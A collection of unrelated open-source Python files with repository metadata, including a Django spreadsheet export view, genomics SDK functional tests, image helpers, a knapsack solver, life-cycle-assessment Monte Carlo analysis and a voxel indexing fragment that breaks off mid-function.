return super(DeleteVacationPeriod, self).delete(request, *args, **kwargs)
class EmployeeVacationPage(TemplateView):
template_name = 'vacation_schedule/employee_vacation_page.html'
def get_context_data(self, **kwargs):
context = super(EmployeeVacationPage, self).get_context_data(**kwargs)
current_user = Employee.objects.filter(user=self.request.user.id).first()
context['current_user'] = current_user
return context
class ExportVacationXlsView(DetailView):
def get(self, request, *args, **kwargs):
response = HttpResponse(content_type='application/ms-excel')
response['Content-Disposition'] = 'attachment; filename="users.xls"'
wb = xlwt.Workbook(encoding='utf-8')
ws = wb.add_sheet('Users')
row_num = 0
columns = [field for field in EmployeeVacationPeriod._meta.get_fields()][1:]
for col_num in range(len(columns)):
ws.write(row_num, col_num, columns[col_num].verbose_name)
rows = EmployeeVacationPeriod.objects.all()
for row_object in rows:
row_num += 1
for col_num, value in enumerate(columns):
ws.write(row_num, col_num, str(getattr(row_object, value.name)))
wb.save(response)
return response
| 2.140625
| 2
|
2020/day02/solve.py
|
h3ssto/advent_of_code
| 0
|
12783494
|
from _shared_python.aoc import *
#------------------------------------------------------------------------------#
INPUT = input_from_file(__file__)
INPUT = map_split(INPUT, r"-|\s+|:\s+")
INPUT = entries_as_tuples(INPUT, types = (int, int, str, str))
#------------------------------------------------------------------------------#
preview_input(INPUT)
#------------------------------------------------------------------------------#
output1 = 0
output2 = 0
#------------------------------------------------------------------------------#
for l,u,c,s in INPUT:
s1 = [x for x in s if x == c]
if l <= len(s1) <= u:
output1 += 1
if (s[l-1] == c) != (s[u-1] == c):
output2 += 1
#------------------------------------------------------------------------------#
print("-" * 64)
print("Output 1:", green(output1))
print("Output 2:", green(output2))
| 2.90625
| 3
|
code/single_scene_optimization.py
|
dukomoran/PESFM
| 52
|
12783495
|
import cv2 # DO NOT REMOVE
from datasets import SceneData, ScenesDataSet
import train
from utils import general_utils, path_utils
from utils.Phases import Phases
import torch
def train_single_model(conf, device, phase):
# Create data
scene_data = SceneData.create_scene_data(conf)
# Create model
model = general_utils.get_class("models." + conf.get_string("model.type"))(conf).to(device)
if phase is Phases.FINE_TUNE:
path = path_utils.path_to_model(conf, Phases.TRAINING)
model.load_state_dict(torch.load(path))
# Sequential Optimization
if conf.get_bool("train.sequential", default=False):
n_cams = scene_data.y.shape[0]
conf['train']['num_of_epochs'] = 1000
conf['train']['scheduler_milestone'] = []
for subset_size in range(2, n_cams):
print("########## Train model on subset of size {} ##########".format(subset_size))
subset_data = SceneData.get_subset(scene_data, subset_size)
conf["dataset"]["scan"] = subset_data.scan_name
dubscene_dataset = ScenesDataSet.ScenesDataSet([subset_data], return_all=True)
subscene_loader = ScenesDataSet.DataLoader(dubscene_dataset).to(device)
_, _, _, _ = train.train(conf, subscene_loader, model, phase)
conf['train']['num_of_epochs'] = 20000
conf['train']['scheduler_milestone'] = [10000]
conf["dataset"]["scan"] = scene_data.scan_name
# Optimize Scene
scene_dataset = ScenesDataSet.ScenesDataSet([scene_data], return_all=True)
scene_loader = ScenesDataSet.DataLoader(scene_dataset).to(device)
train_stat, train_errors, _, _ = train.train(conf, scene_loader, model, phase)
# Write results
train_errors.drop("Mean", inplace=True)
train_stat["Scene"] = train_errors.index
train_stat.set_index("Scene", inplace=True)
train_res = train_errors.join(train_stat)
general_utils.write_results(conf, train_res, file_name="Results_" + phase.name, append=True)
if __name__ == "__main__":
conf, device, phase = general_utils.init_exp(Phases.OPTIMIZATION.name)
train_single_model(conf, device, phase)
| 2.625
| 3
|
python/functest/sdk_test.py
|
spiralgenetics/biograph
| 16
|
12783496
|
<reponame>spiralgenetics/biograph<filename>python/functest/sdk_test.py
"""
sdk.py: Test the python SDK and ipython notebooks.
"""
import os
import glob
import queue
import unittest
import subprocess
import tabix
from python.functest.utils.setup import (
ftest_setup,
ftest_teardown,
ftest_module_setup
)
from python.functest.utils.fileops import (
sha1_file
)
from python.functest.utils.defaults import (
GOLDEN_DIR
)
import biograph
from biograph.tools.coverage import MICROCONTIGS, get_regions
def setUpModule():
""" Announce ourselves by printing the module docstring. """
print(__doc__)
# Module requirements
ftest_module_setup()
class SDKTestCases(unittest.TestCase):
""" unittest Test definitions follow """
# keep pylint happy
data_dir = None
def setUp(self):
ftest_setup(self)
def tearDown(self):
ftest_teardown(self)
def check(self, cmd, code=0):
""" Run a shell command, assert exit code is correct """
actual = subprocess.call(cmd # + ">/dev/null 2>&1"
, shell=True)
self.assertEqual(code, actual, f"{cmd} exited code {actual}")
def check_results(self, file1, file2):
""" sha1 two files, throw if they don't match """
self.assertEqual(sha1_file(test=self, file_name=file1),
sha1_file(file2), "%s and %s do not match" % (file1, file2))
# @unittest.skip('nope')
def test_basic_sdk(self):
"""
Basic SDK test
"""
my_bg = biograph.BioGraph("datasets/lambdaToyData/benchmark/proband_lambda.bg")
self.assertEqual(my_bg.metadata.accession_id, 'proband')
self.assertEqual(my_bg.metadata.samples['proband'], '47b43dbb0306fb5da00bca9c33b2fb3de9db7bf4')
self.assertEqual(str(my_bg.seqset.find('ACGT')), '<SeqsetEntry 11049-11336: ACGT>')
self.assertEqual(my_bg.seqset.size(), 97340)
r = my_bg.open_readmap()
self.assertEqual(r.get_num_bases(), 7235142)
stats = r.get_pair_stats()
self.assertEqual(stats.paired_reads, 39974)
self.assertEqual(stats.unpaired_reads, 8982)
# @unittest.skip('nope')
def test_basic_sdk_reference(self):
"""
Basic reference test
"""
grch37 = biograph.Reference("/reference/human_g1k_v37/")
# 16 contigs in chr 7
self.assertEqual(len(grch37.find_ranges("7", 1, 1000000000)), 16)
# 11 contigs in chr 21
self.assertEqual(len(grch37.find_ranges("21", 1, 1000000000)), 11)
rc = grch37.find('ACGT')
self.assertEqual(rc.matches, 2153084)
# @unittest.skip('nope')
def test_sequence_splice(self):
"""
Testing the splicing/indexing and string comparisons for sequence
"""
string = "ATCGAATACATAA"
j = biograph.Sequence(string)
# Some random splicing and access
self.assertEqual(string[1], j[1])
self.assertEqual(string[1:5], j[1:5])
# self.assertEqual(string[2:7:2], j[2:7:2])
# self.assertEqual(string[::-1], j[::-1])
# @unittest.skip('nope')
def test_bgtools_basic(self):
""" bgtools script tests """
bgtools = "./python/functest/biograph_main "
# exit 1
self.check(bgtools, code=1)
# exit 0
self.check(f"{bgtools} -h")
# version
cmd = f"{bgtools} version"
self.assertEqual(subprocess.check_output(cmd, shell=True).rstrip().decode(), f"biograph version {biograph.version()}")
# Every command we ship should have a help
for cmd in (
"full_pipeline",
"reference",
"create",
"discovery",
"coverage",
"qual_classifier",
"vdb",
"stats",
):
self.check(f"{bgtools} {cmd} -h")
# @unittest.skip('nope')
def test_bgtools_stats(self):
""" bgtools script tests """
self.maxDiff = None
bgtools = "./python/functest/biograph_main "
cmd = f"{bgtools} stats -b golden/e_coli_merged.bg -r datasets/reference/e_coli_k12_ASM584v1/"
# pylint: disable=bad-continuation
self.assertEqual(subprocess.check_output(cmd, shell=True).decode(),
"""Sample: e_coli_test
NumReads: 38,047
NumBases: 3,804,700
MaxReadLength: 100
MinReadLength: 100
NumPairedReads: 25,762
NumUnpairedReads: 12,285
NumPairedBases: 2,576,200
NumUnpairedBases: 1,228,500
MeanInsertSize: 504.73
MedianInsertSize: 502.00
SDInsertSize: 49.72
EstimatedCoverage: 0.80
Sample: test_accession_id
NumReads: 8,444
NumBases: 288,464
MaxReadLength: 35
MinReadLength: 30
NumPairedReads: 0
NumUnpairedReads: 8,444
NumPairedBases: 0
NumUnpairedBases: 288,464
MeanInsertSize: 0.00
MedianInsertSize: 0.00
SDInsertSize: 0.00
EstimatedCoverage: 0.06
""")
# @unittest.skip('nope')
def test_bgtools_pcmp(self):
""" bgtools script tests """
os.environ['PATH'] = "/share/software/bin:" + os.environ['PATH']
bgtools = "./python/functest/biograph_main "
bgb = "./modules/biograph/bgbinary "
dd = self.data_dir
self.check(f"{bgb} create --in datasets/bams/e_coli/e_coli_test.bam --out {dd}/e_coli.bg --ref datasets/reference/e_coli_k12_ASM584v1/")
self.check(f"{bgb} discovery --in {dd}/e_coli.bg --out {dd}/e_coli_variants.vcf --enable-pop-tracer=false --ref datasets/reference/e_coli_k12_ASM584v1/")
self.assertEqual(subprocess.call(f"vcf-sort < {dd}/e_coli_variants.vcf | bgzip > {dd}/e_coli_variants.vcf.gz", shell=True), 0)
self.check(f"tabix {dd}/e_coli_variants.vcf.gz")
self.check(f"{bgtools} coverage -d {dd}/ecoli.cov.jl -b {dd}/e_coli.bg -v {dd}/e_coli_variants.vcf.gz -r datasets/reference/e_coli_k12_ASM584v1/ -o /dev/stdout | vcf-sort > {dd}/output.vcf")
self.check(f"{bgb} discovery --in {dd}/e_coli.bg --out {dd}/e_coli_variants_ml.vcf --ref datasets/reference/e_coli_k12_ASM584v1/")
self.assertEqual(subprocess.call(f"vcf-sort < {dd}/e_coli_variants_ml.vcf | bgzip > {dd}/e_coli_variants_ml.vcf.gz", shell=True), 0)
self.check(f"tabix {dd}/e_coli_variants_ml.vcf.gz")
self.check(f"{bgtools} coverage -d {dd}/e_coli_ml.cov.jl -b {dd}/e_coli.bg -v {dd}/e_coli_variants_ml.vcf.gz -r datasets/reference/e_coli_k12_ASM584v1/ -o /dev/stdout | vcf-sort > {dd}/output2.vcf")
# Better test would be truvari to validate the actual variants, but an identical output line count is close enough for now.
self.assertEqual(subprocess.check_output(f"wc -l < {dd}/output.vcf", shell=True).rstrip(), b'166', 0)
# This will exit 1 if exceptions correctly propagate from child workers back up to the main process (DEV-511)
self.check(f"{bgtools} coverage -d {dd}/ecoli.cov.jl -b {dd}/e_coli.bg -v golden/ftest/bad.vcf.gz -r datasets/reference/e_coli_k12_ASM584v1 -o {dd}/bad_out.vcf", 1)
# @unittest.skip('nope')
def test_bgtools_qual_classifier(self):
""" bgtools script tests """
os.environ['PATH'] = "/share/software/bin:" + os.environ['PATH']
dd = self.data_dir
bgtools = "./python/functest/biograph_main "
toydata = "datasets/ml_toydata_lambda"
sample_dir = "proband_jul17"
golden_file = "proband_17feb2021"
df = f"{toydata}/{sample_dir}/df.jl"
grm = f"{toydata}/{sample_dir}/grm.jl"
pcmp = f"{toydata}/{sample_dir}/pcmp.vcf.gz"
sv_ao_model = "python/functest/biograph_model.ml"
# Strip headers and compare variants for sv and ao
self.check(f"{bgtools} qual_classifier --grm {grm} --dataframe {df} --vcf {pcmp} --model {sv_ao_model} --out {dd}/sv_ao.vcf")
self.check(f"grep -v ^# {GOLDEN_DIR}/ml/{golden_file}.filter.vcf > {dd}/sv_ao.golden.vcf")
self.check(f"vcf-sort < {dd}/sv_ao.vcf | grep -v ^# > {dd}/sv_ao.check.vcf")
self.check_results(f"{dd}/sv_ao.golden.vcf", f"{dd}/sv_ao.check.vcf")
# @unittest.skip('nope')
def test_coverage_microcontigs(self):
""" microcontig boundary generation tests """
contigq = queue.Queue()
workerq = queue.Queue()
variants = set()
ref = biograph.Reference('datasets/reference/e_coli_k12_ASM584v1/')
# This VCF should cover every edge case (multiple variants on the same
# position, deletions that span a boundary, begin, end, one before begin, one
# after end, with and without a bed file, etc.)
#
# This tests counts on the vcf ID field being unique for each variant
vcf_file = f'{GOLDEN_DIR}/microcontigs.vcf.gz'
for bed_file in None, f'{GOLDEN_DIR}/microcontigs.bed':
for clearance in range(2, 10):
for contig_size in range(1, 20):
for region in get_regions(bed_file, ref):
contigq.put(region)
contigq.put(None)
# Find the microcontigs
while True:
item = contigq.get()
if item is None:
break
MICROCONTIGS.find(item, vcf_file, clearance, contig_size, workerq)
workerq.put(None)
# Add every variant
t = tabix.open(vcf_file)
for ctg in ref.scaffolds:
try:
for v in t.query(ctg, 0, int(ref.scaffold_lens[ctg])):
variants.add(v[2])
except tabix.TabixError:
pass
self.assertTrue(len(variants) > 0, f"No variants to process. Are you using the correct reference? (bed: {bed_file} clearance: {clearance} contig_size: {contig_size})")
# Remove each variant, one microcontig at a time
while True:
contig = workerq.get()
if contig is None:
break
# print(contig)
for v in t.query(contig[0], contig[1], contig[2]):
# This will raise if the variant was previously removed
variants.remove(v[2])
# There should be none left over
self.assertEqual(len(variants), 0, f"There were {len(variants)} unprocessed variants remaining. (bed: {bed_file} clearance: {clearance} contig_size: {contig_size})")
def setup_dirs(self):
"Makes a bin directory with bgbinary, biograph, and truvari, and adds it to the path."
bindir = os.path.join(self.data_dir, "bin")
tmpdir = os.path.join(self.data_dir, "tmp")
for dirname in bindir, tmpdir:
os.mkdir(dirname)
os.symlink(os.getcwd() + "/modules/biograph/bgbinary", bindir + "/bgbinary")
truvari_dir = glob.glob(os.getcwd() + "/external/*pypi__Truvari_2*/Truvari-*.data/scripts")[0]
os.symlink(os.getcwd() + "/python/functest/biograph_main", bindir + "/biograph")
with open(bindir + "/truvari", "w") as f:
f.write(f"""#!/bin/sh\nexec python3 {truvari_dir}/truvari "$@"\n""")
os.chmod(bindir + "/truvari", 0o755)
os.environ['PATH'] = (bindir + ":" +
os.environ['PATH'] + ":" +
"/share/software/bin")
return tmpdir
@unittest.skip('lambda toydata is broken')
def test_bgtools_squareoff(self):
""" bgtools script tests """
self.setup_dirs()
dd = self.data_dir
toydata = "/share/ml_toydata_lambda"
sample_dir = "proband_jul17"
golden_file = "proband_16feb2021"
pcmp = f"{toydata}/{sample_dir}/pcmp.vcf.gz"
sv_ao_model = "/share/classifier/model_sv_ao_gt_16Feb2021.ml"
bg = "datasets/lambdaToyData/benchmark/proband_lambda.bg"
ref = "datasets/lambdaToyData/benchmark/ref_lambda/"
self.check(f"biograph squareoff -b {bg} --variants {pcmp} --model {sv_ao_model} --reference {ref} -o {dd}/sq.vcf.gz")
self.check(f"zcat {dd}/sq.vcf.gz | vcf-sort | grep -v ^# > {dd}/sq.check.vcf")
self.check(f"grep -v ^# {GOLDEN_DIR}/ml/{golden_file}.filter.vcf > {dd}/sv_ao.golden.vcf")
with open(f"{dd}/sv_ao.golden.vcf") as fha, open(f"{dd}/sq.check.vcf") as fhb:
acnt = len(fha.readlines())
bcnt = len(fhb.readlines())
self.assertEqual(acnt, bcnt, f"Incorrect line counts {acnt} != {bcnt}")
# @unittest.skip('runipy output is not deterministic')
# def test_notebooks(self):
# """
# Test all jupyter (iPython) notebooks
# This doesn't currently work because runipy doesn't produce deterministic output
# when the script writes to STDOUT (the output fields are arbitrarily chunked and
# impossible to compare without further manipulation.)
# To make golden files for new notebooks, run this:
# runipy new_notebook.ipynb $GOLDEN_DIR/jupyter/new_notebook.ipynb.out
# """
# ipydir = "{0}/python/jupyter/biograph/".format(SPIRAL_ROOT)
# for f in os.listdir(ipydir):
# if f.endswith(".ipynb"):
# self.check("runipy '{0}/{1}' '{2}/{1}.out'".format(ipydir, f, self.data_dir))
# # strip out "matplotlib.figure.Figure at <0xaddress>" from txt lines
# subprocess.call(
# "grep -v matplotlib.figure.Figure '{0}/{1}.out' > '{0}/{1}.out.clean'".format(self.data_dir, f), shell=True)
# self.check_results('{0}/jupyter/{1}.out'.format(
# GOLDEN_DIR, f), '{0}/{1}.out.clean'.format(self.data_dir, f))
if __name__ == '__main__':
unittest.main(verbosity=2)
| 2.203125
| 2
|
backend/src/procyon_api/domain/exceptions/root.py
|
KitKod/Procyon
| 0
|
12783497
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
class ProcyonException(Exception):
code = "root_exception"
class NotFoundError(ProcyonException):
code = "not_found_error"
class AlreadyExistsError(ProcyonException):
code = "already_exists_error"
class ForbiddenError(ProcyonException):
code = "forbidden_error"
| 1.820313
| 2
|
helpers.py
|
andodevel/rmbg
| 0
|
12783498
|
<gh_stars>0
import datetime
import os
import timeit
import cv2
import numpy as np
from config import get_logger
logger = get_logger()
class Timer:
"""Measure time used."""
def __init__(self, id: str, round_ndigits: int = 2):
self._id = id
self._round_ndigits = round_ndigits
self._start_time = (timeit.default_timer() * 1000)
def __call__(self) -> float:
return (timeit.default_timer() * 1000) - self._start_time
def __str__(self) -> str:
return f"Time elapsed of `{self._id}`: " + str(
datetime.timedelta(milliseconds=round(self(), self._round_ndigits)))
def time_exec(id, method, *args, **kwargs):
_timer = Timer(id)
result = method(*args, **kwargs)
logger.info(_timer)
return result
def load_image(imagePath):
image = cv2.imread(imagePath)
if image is None:
raise Exception(f"Invalid image with path `{imagePath}`")
return cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
def to_gray_image(image):
gray_image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
return cv2.cvtColor(gray_image, cv2.COLOR_GRAY2RGB)
def rgb_to_lab(image):
return cv2.cvtColor(image, cv2.COLOR_RGB2LAB)
def apply_image_mask(masks, image, fallback_image):
"""Apply mask to image, masked pixel keep original value,
otherwise use its gray version"""
return np.where(
masks,
image,
fallback_image
).astype(np.uint8)
def slide_window(array, window=(0,), a_steps=None, w_steps=None, axes=None, to_end=True):
array = np.asarray(array)
orig_shape = np.asarray(array.shape)
window = np.atleast_1d(window).astype(int) # maybe crude to cast to int...
if axes is not None:
axes = np.atleast_1d(axes)
w = np.zeros(array.ndim, dtype=int)
for axis, size in zip(axes, window):
w[axis] = size
window = w
# Check if window is legal:
if window.ndim > 1:
raise ValueError("`window` must be one-dimensional.")
if np.any(window < 0):
raise ValueError("All elements of `window` must be larger then 1.")
if array.ndim < len(window):
raise ValueError("`window` length must be less or equal `array` dimension.")
tmp_a_steps = np.ones_like(orig_shape)
if a_steps is not None:
a_steps = np.atleast_1d(a_steps)
if a_steps.ndim != 1:
raise ValueError("`asteps` must be either a scalar or one dimensional.")
if len(a_steps) > array.ndim:
raise ValueError("`asteps` cannot be longer then the `array` dimension.")
# does not enforce alignment, so that steps can be same as window too.
tmp_a_steps[-len(a_steps):] = a_steps
if np.any(a_steps < 1):
raise ValueError("All elements of `asteps` must be larger then 1.")
a_steps = tmp_a_steps
tmp_w_steps = np.ones_like(window)
if w_steps is not None:
w_steps = np.atleast_1d(w_steps)
if w_steps.shape != window.shape:
raise ValueError("`wsteps` must have the same shape as `window`.")
if np.any(w_steps < 0):
raise ValueError("All elements of `wsteps` must be larger then 0.")
tmp_w_steps[:] = w_steps
tmp_w_steps[window == 0] = 1 # make sure that steps are 1 for non-existing dims.
w_steps = tmp_w_steps
# Check that the window would not be larger then the original:
if np.any(orig_shape[-len(window):] < window * w_steps):
raise ValueError("`window` * `wsteps` larger then `array` in at least one dimension.")
new_shape = orig_shape # just renaming...
# For calculating the new shape 0s must act like 1s:
_window = window.copy()
_window[_window == 0] = 1
new_shape[-len(window):] += w_steps - _window * w_steps
new_shape = (new_shape + a_steps - 1) // a_steps
# make sure the new_shape is at least 1 in any "old" dimension (ie. steps
# is (too) large, but we do not care.
new_shape[new_shape < 1] = 1
shape = new_shape
strides = np.asarray(array.strides)
strides *= a_steps
new_strides = array.strides[-len(window):] * w_steps
# The full new shape and strides:
if to_end:
new_shape = np.concatenate((shape, window))
new_strides = np.concatenate((strides, new_strides))
else:
_ = np.zeros_like(shape)
_[-len(window):] = window
_window = _.copy()
_[-len(window):] = new_strides
_new_strides = _
new_shape = np.zeros(len(shape) * 2, dtype=int)
new_strides = np.zeros(len(shape) * 2, dtype=int)
new_shape[::2] = shape
new_strides[::2] = strides
new_shape[1::2] = _window
new_strides[1::2] = _new_strides
new_strides = new_strides[new_shape != 0]
new_shape = new_shape[new_shape != 0]
return np.lib.stride_tricks.as_strided(array, shape=new_shape, strides=new_strides)
def simple_correlate(array, kernel):
pass
def resize_image(image, width=None, height=None, inter=cv2.INTER_AREA):
dim = None
(h, w) = image.shape[:2]
if width is None and height is None:
return image
if (width is not None and width > w) or (height is not None and height > h):
return image
if width is None:
r = height / float(h)
dim = (int(w * r), height)
else:
r = width / float(w)
dim = (width, int(h * r))
resized = cv2.resize(image, dim, interpolation=inter)
return resized
# TODO: replace by checking magic numbers of file format
def is_image_file(file_path):
_, filename = os.path.split(file_path)
return os.path.isfile(file_path) and filename.lower().endswith(('.png', '.jpg', '.jpeg', '.tiff', '.bmp', '.gif'))
| 2.578125
| 3
|
01-algorithm-design-and-techniques/5_dynamic_programming/knapsack.py
|
hamidgasmi/training.computerscience.algorithms-datastructures
| 8
|
12783499
|
<filename>01-algorithm-design-and-techniques/5_dynamic_programming/knapsack.py<gh_stars>1-10
import sys
def optimal_weight(W, w):
V = [[0 for j in range(W + 1)] for i in range(len(w) + 1)]
for i in range(1, len(w) + 1):
for j in range(1, W + 1):
V[i][j] = V[i - 1][j]
if w[i - 1] <= j:
val = V[i - 1][j - w[i - 1]] + w[i - 1]
if val > V[i][j]:
V[i][j] = val
return V[len(w)][W]
if __name__ == '__main__':
input = sys.stdin.read()
W, n, *w = list(map(int, input.split()))
print(optimal_weight(W, w))
#python3 knapsack.py <<< "10 3 1 4 8" 9
| 3.75
| 4
|
04.2_Comparative_MC.py
|
massimopizzol/B4B
| 11
|
12783500
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 30 07:05:07 2018
@author: massimo
"""
from brightway2 import *
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
from scipy import stats
projects
projects.set_current('bw2_import_ecoinvent_3.4')
databases
db = Database("ecoinvent 3.4 conseq")
ipcc = ('IPCC 2013', 'climate change', 'GTP 100a')
# Simple montecarlo on ecoinvent process as we know it.
mydemand = {db.random(): 1} # select a random process
lca = LCA(mydemand, ipcc)
lca.lci()
lca.lcia()
lca.score
mc = MonteCarloLCA(mydemand, ipcc)
mc_results = [next(mc) for x in range(500)]
plt.hist(mc_results, density=True)
plt.ylabel("Probability")
plt.xlabel(methods[ipcc]["unit"])
pd.DataFrame(mc_results).describe()
lca.score
np.exp(np.mean(np.log(mc_results))) # geometric mean
# Now comparative analysis
db.search('lorry transport euro5') # look at the names
activity_name = 'transport, freight, lorry >32 metric ton, EURO5'
for activity in Database("ecoinvent 3.4 conseq"):
if activity['name'] == activity_name:
truckE5 = Database("ecoinvent 3.4 conseq").get(activity['code'])
activity_name = 'transport, freight, lorry >32 metric ton, EURO6'
for activity in Database("ecoinvent 3.4 conseq"):
if activity['name'] == activity_name:
truckE6 = Database("ecoinvent 3.4 conseq").get(activity['code'])
truckE5.as_dict()
truckE6.as_dict()
# make a list with the alternatives
demands = [{truckE5: 1}, {truckE6: 1}]
mc = MonteCarloLCA(demands[0], ipcc)
next(mc)
# look at this first
mc.redo_lcia(demands[0])
mc.score
mc.redo_lcia(demands[1])
mc.score
mc.redo_lcia(demands[0])
mc.score
# Now for several iterations
iterations = 100
simulations = []
for _ in range(iterations):
print(_)
next(mc)
mcresults = []
for i in demands:
mc.redo_lcia(i)
mcresults.append(mc.score)
simulations.append(mcresults)
simulations
df = pd.DataFrame(simulations, columns = ['truckE5','truckE6'])
df.to_csv('ComparativeMCsimulation.csv') # to save it
#plot stuff (using the matplotlib package)
df.plot(kind = 'box')
#df.T.melt()
plt.plot(df.truckE5, df.truckE6, 'o')
plt.xlabel('truckE5 - kg CO2-eq')
plt.ylabel('truckE6 - kg CO2-eq')
# You can see how many times the difference is positive. This is what Simapro does
df.diffe = df.truckE5 - df.truckE6
plt.hist(df.diffe.values)
len(df.diffe[df.diffe < 0])
len(df.diffe[df.diffe > 0])
len(df.diffe[df.diffe == 0])
# Statistical testing (using the stats package)
# I can use a paired t-test
t_value, p_value = stats.ttest_rel(df.truckE5,df.truckE6)
t_value
p_value
# But wait! did we check for normality?
plt.hist(df.truckE5.values)
plt.xlabel('truckE5 - kg CO2-eq')
SW_value, SW_p_value = stats.shapiro(df.truckE5)
SW_p_value # Not normally distributed...
plt.hist(df.truckE6.values)
SW_value, SW_p_value = stats.shapiro(df.truckE6)
SW_p_value # Normally distributed if alpha = 0.05...Not strong though if we hasd say 1000 samples
# Alright need a non-parametric test. Wilcox sign rank test
s_value, p_value = stats.wilcoxon(df.truckE5, df.truckE6)
s_value
p_value # Not bad, significant difference!
# What if we had done the MC on the processes independently.
mc1 = MonteCarloLCA({truckE5: 1}, ipcc)
mc1_results = [next(mc1) for x in range(100)]
mc2 = MonteCarloLCA({truckE5: 1}, ipcc) # it's still truckE5!
mc2_results = [next(mc2) for x in range(100)]
df_ind = pd.DataFrame({'mc1': mc1_results, 'mc2' : mc2_results})
# compare to this
demands = [{truckE5: 1}, {truckE5: 1}] # I am using the smae process two times.
mc = MonteCarloLCA(demands[0], ipcc)
iterations = 100
simulations = []
for _ in range(iterations):
print(_)
next(mc)
mcresults = []
for i in demands:
mc.redo_lcia(i)
mcresults.append(mc.score)
simulations.append(mcresults)
simulations
df_dep = pd.DataFrame(simulations, columns = ['mc1','mc2'])
# Plot stuff
df_dep.plot(kind = 'box')
df_ind.plot(kind = 'box')
plt.plot(df_dep.mc1, df_dep.mc2, 'o')
plt.plot(df_ind.mc1, df_ind.mc2, 'o') # see?
# and of course:
t_value, p_value = stats.ttest_rel(df_dep.mc1, df_dep.mc2)
t_value
p_value # no difference AT ALL (as expected)
t_value, p_value = stats.ttest_rel(df_ind.mc1, df_ind.mc2)
t_value
p_value # no difference (as expected! But still some variance!)
s_value, p_value = stats.wilcoxon(df_ind.mc1, df_ind.mc2)
s_value
p_value
| 2.796875
| 3
|
model_training/torch2npy.py
|
wurenzhi/-learned_ndv_estimator
| 0
|
12783501
|
from network import Regressor, Loss_gamma_0_6
import numpy as np
import skorch
from skorch import NeuralNetRegressor
from torch import optim
def load_model(load_cp, n_in=106,device='cuda'):
cp = skorch.callbacks.Checkpoint(dirname=load_cp)
net = NeuralNetRegressor(
Regressor(n_in=n_in),
criterion=Loss_gamma_0_6,
max_epochs=2000,
optimizer=optim.Adam,
optimizer__amsgrad=True,
optimizer__weight_decay=0.1,
lr=0.0003,
iterator_train__shuffle=True,
iterator_train__num_workers=32,
iterator_train__pin_memory=True,
device=device,
batch_size=50000,
iterator_train__batch_size=50000,
)
net.initialize()
net.load_params(checkpoint=cp)
return net
def save_model_para(model_cp):
'''
convert trained model paras(saved at checkpoint model_cp) to numpy format
:param model_cp:
:return:
'''
model = load_model(model_cp, n_in=106,device='cpu')
paras = []
for para in model.get_params()['module'].parameters():
paras.append(para.data.cpu().numpy())
np.save("model_paras.npy", paras)
save_model_para('cp_gamma_0_6')
| 2.34375
| 2
|
Kapitel_1/_E1_int_string_adder.py
|
Geralonx/Classes_Tutorial
| 1
|
12783502
|
<filename>Kapitel_1/_E1_int_string_adder.py<gh_stars>1-10
# --- Diese Klasse soll demonstrieren, dass das 'other'-Arguemnt der 'Dunder'-Methods alles sein darf ---#
class IntStringAdder(int):
def __init__(self, number):
self.number = number
def __add__(self, other):
if isinstance(other, str):
try:
x = int(other)
except:
raise ValueError(f"String Value >{other}< cannot be converted to 'int'.")
else:
raise TypeError("Wrong datatype, expected a 'str' as 2nd operand.")
return IntStringAdder(self.number + x)
def __str__(self):
return f"My Value is {self.number}"
# --- Instanziierung der Klasse mittels Konstruktor --- #
my_number = IntStringAdder(10)
# --- Addition mittels expliziter Syntax und implizitem Methodenaufruf --- #
# --- Die Rückgabe ist eine neue Instanz der Klasse --- #
my_new_number = my_number + '15'
print(my_new_number)
# --- Wirft einen Error, da sich der str-Wert 'Simon' nicht in einen Integer umwandeln lässt --- #
my_new_number = my_number + 'Simon'
| 3.71875
| 4
|
odvm/cuboids.py
|
pmp-p/odvm
| 3
|
12783503
|
<reponame>pmp-p/odvm
def ijk1b_to_idx0_7( i, j, k ):
assert( 0 <= i <= 1 and 0 <= j <= 1 and 0 <= k <= 1 )
return ((k&1)<<2)|((j&1)<<1)|(i&1)
def idx0_7_to_ijk1b( idx ):
assert( 0 <= idx <= 7 )
return ( idx&1, (idx&2)>>1, (idx&4)>>2 )
def ijk2b_to_idx0_63( i, j, k ):
assert( 0 <= i <= 3 and 0 <= j <= 3 and 0 <= k <= 3 )
return ( ((k&1)<<2)|((j&1)<<1)|(i&1) ) | ( ((k&2)<<4)|((j&2)<<3)|((i&2)<<2) )
def idx0_63_to_ijk2b( idx ):
assert( 0 <= idx <= 63 )
return ( ((idx&8)>>2)|(idx&1), ((idx&16)>>3)|((idx&2)>>1), ((idx&32)>>4)|((idx&4)>>2) )
mask_to_2x2x2 = [(0,0,0,0)]*8
mask_to_1x2x2 = [(0,0,0,0)]*16
mask_to_2x1x2 = [(0,0,0,0)]*16
mask_to_2x2x1 = [(0,0,0,0)]*16
mask_to_2x1x1 = [(0,0,0,0)]*32
mask_to_1x2x1 = [(0,0,0,0)]*32
mask_to_1x1x2 = [(0,0,0,0)]*32
mask_to_i2_j2 = [(0,0,0,0,0,0,0)]*64
mask_to_i2_k2 = [(0,0,0,0,0,0,0)]*64
mask_to_j2_k2 = [(0,0,0,0,0,0,0)]*64
def calc_mask_to_xxxxx():
idx0 = 0
idx1 = 0
idx2 = 0
idx3 = 0
for k in (0,2):
for j in (0,2):
for i in (0,2):
m000 = 1<<ijk2b_to_idx0_63( i , j , k )
m010 = 1<<ijk2b_to_idx0_63( i , j+1, k )
m001 = 1<<ijk2b_to_idx0_63( i , j , k+1 )
m011 = 1<<ijk2b_to_idx0_63( i , j+1, k+1 )
m100 = 1<<ijk2b_to_idx0_63( i+1, j , k )
m110 = 1<<ijk2b_to_idx0_63( i+1, j+1, k )
m101 = 1<<ijk2b_to_idx0_63( i+1, j , k+1 )
m111 = 1<<ijk2b_to_idx0_63( i+1, j+1, k+1 )
